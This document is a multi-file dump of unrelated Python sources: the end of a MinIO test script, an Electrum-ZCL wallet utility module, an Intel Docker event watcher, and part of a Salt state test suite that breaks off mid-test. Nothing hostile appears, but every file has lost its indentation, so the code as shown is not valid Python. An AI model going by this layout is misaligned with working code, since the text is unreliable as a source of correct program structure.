subprocess.run("mc admin service stop myminio", shell=True)
print("finished")
x = threading.Thread(target=start_minio, daemon=True)
x.start()
i = 0
while i < 5:
time.sleep(5)
print(i)
i += 1
stop_minio()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import requests
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
is_bundle = getattr(sys, 'frozen', False)
is_macOS = sys.platform == 'darwin'
base_units = {'ZCL':8, 'mZCL':5, 'uZCL':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-zcl")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-zcl")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zcl")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
# For raw json, append /insight-api-zcash
mainnet_block_explorers = {
'ZclassicExplorer.com': ('http://zclassicexplorer.com',
{'tx': 'tx', 'addr': 'address'}),
'ZCLMine.pro': ('http://explorer.zclmine.pro',
{'tx': 'tx', 'addr': 'address'}),
'MyZCL.com': ('http://myzcl.com',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
# TODO zcl testnet block explorer
testnet_block_explorers = {
#'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
#{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'ZclassicExplorer.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Zclassic address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Zclassic address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def get_cert_path():
if is_bundle and is_macOS:
# set in ./electrum
return requests.utils.DEFAULT_CA_BUNDLE_PATH
return requests.certs.where()
|
event_watcher.py
|
"""
Agent which monitors and reports the state of critical components of the framework
Copyright (C) 2017-2022 Intel Corporation
SPDX-License-Identifier: Apache-2.0
"""
import logging
from threading import Thread
from .constants import EVENTS_CHANNEL
from .constants import REMEDIATION_CONTAINER_CHANNEL
from .constants import REMEDIATION_IMAGE_CHANNEL
from .constants import TRTL_EVENTS
from .constants import DEFAULT_DBS_MODE
from .config_dbs import ConfigDbs
from .docker_bench_security_runner import DockerBenchRunner
from inbm_common_lib.shell_runner import PseudoShellRunner
logger = logging.getLogger(__name__)
current_dbs_mode = DEFAULT_DBS_MODE
class EventWatcher(Thread):
"""Starts up a thread to watch for events coming from Docker"""
def __init__(self, broker):
Thread.__init__(self, name="dockerEventWatcher")
self._broker = broker
self.daemon = True
self._process = None
self._running = True
def run(self): # pragma: no cover
"""Runs the EventWatcher thread"""
self._process = PseudoShellRunner().get_process(TRTL_EVENTS)
logger.debug(f'Watching for Docker events on PID: {self._process.pid}')
self._parse_process_output(self._process)
logger.debug("Event Watcher thread exited")
def set_dbs_mode(self, mode_value):
global current_dbs_mode
current_dbs_mode = mode_value
logger.debug(f"Current DBS mode is set to - {current_dbs_mode}")
def run_docker_bench_security(self): # pragma: no cover
"""Launch Docker Bench Security in separate thread."""
def run():
if current_dbs_mode != ConfigDbs.OFF:
dbs = DockerBenchRunner()
logger.debug(f"DBS mode : {current_dbs_mode} , Launching DBS checks...")
dbs.start()
dbs.join()
if current_dbs_mode == ConfigDbs.ON:
logger.debug("Parsing DBS result after DBS check. . .")
self._parse_dbs_result(dbs.result, dbs)
else:
logger.debug(
"Failed Images and Containers are not terminated since \
DBS is set to - {}".format(current_dbs_mode))
else:
logger.debug(
"DBS check will not run, since DBS is turned OFF. Mode : {}"
.format(current_dbs_mode))
thread = Thread(target=run)
thread.daemon = True
thread.start()
def _check_failed_containers(self, failed_containers: str) -> None:
logger.debug("Passing failed containers on REMEDIATION_CONTAINER_CHANNEL")
if failed_containers and len(failed_containers) > 0:
self._broker.publish(REMEDIATION_CONTAINER_CHANNEL, str(failed_containers))
def _check_failed_images(self, failed_images: str) -> None:
logger.debug("Passing failed images on REMEDIATION_IMAGE_CHANNEL")
if failed_images and len(failed_images) > 0:
self._broker.publish(REMEDIATION_IMAGE_CHANNEL,
str(failed_images))
def _parse_dbs_result(self, result, dbs):
if result is not None:
failed_containers = dbs.failed_container_list
failed_images = dbs.failed_image_list
result_string = dbs.result_string
self._check_failed_containers(failed_containers)
self._check_failed_images(failed_images)
self._broker.publish(
EVENTS_CHANNEL, "Docker Bench Security results: " + result_string)
else:
self._broker.publish(EVENTS_CHANNEL, "Unable to run Docker Bench Security")
@staticmethod
def _output_ended(next_line, process):
return True if next_line == '' and process.poll() is not None else False
def _process_output(self, events, next_line):
if len(events) < 3:
logger.debug(
" ".join(TRTL_EVENTS) +
" command unexpected line (not enough fields): [" +
next_line + "]")
else:
event_type = events[2]
obj_id = events[1]
action = events[0]
logger.info(action + " on " + event_type + " with id " + obj_id)
if action.strip() == 'start' and event_type.strip() == 'container' \
and 'docker-bench-security' not in events[3]:
logger.debug('DBS check triggered via action: ' +
action.strip() + ' event: ' + event_type.strip())
self.run_docker_bench_security()
logger.debug(" ".join(TRTL_EVENTS) + " command done processing.")
def _parse_process_output(self, process):
while self._running:
logger.debug(" ".join(TRTL_EVENTS) + " command output log start.")
# we filter out bad characters but still accept the rest of the string
# here based on experience running the underlying command
next_line = process.stdout.readline().decode('utf-8', errors='replace')
if self._output_ended(next_line, process):
break
logger.debug(" ".join(TRTL_EVENTS) + " command output log: [" + next_line + "]")
events = next_line.split('\t')
self._process_output(events, next_line)
def stop(self):
"""Stop event watcher"""
self._running = False
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir, flaky
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE, TMP_STATE_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
cls.TIMEOUT = 600 if salt.utils.platform.is_windows() else 10
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_show_states_missing_sls(self):
'''
Test state.show_states with a sls file
defined in a top file is missing
'''
with salt.utils.files.fopen(os.path.join(TMP_STATE_TREE, 'top.sls'), 'w') as top_file:
top_file.write(textwrap.dedent('''\
base:
'*':
- doesnotexist
'''))
states = self.run_function('state.show_states')
assert isinstance(states, list)
assert states == ["No matching sls found for 'doesnotexist' in env 'base'"]
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if exiting
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
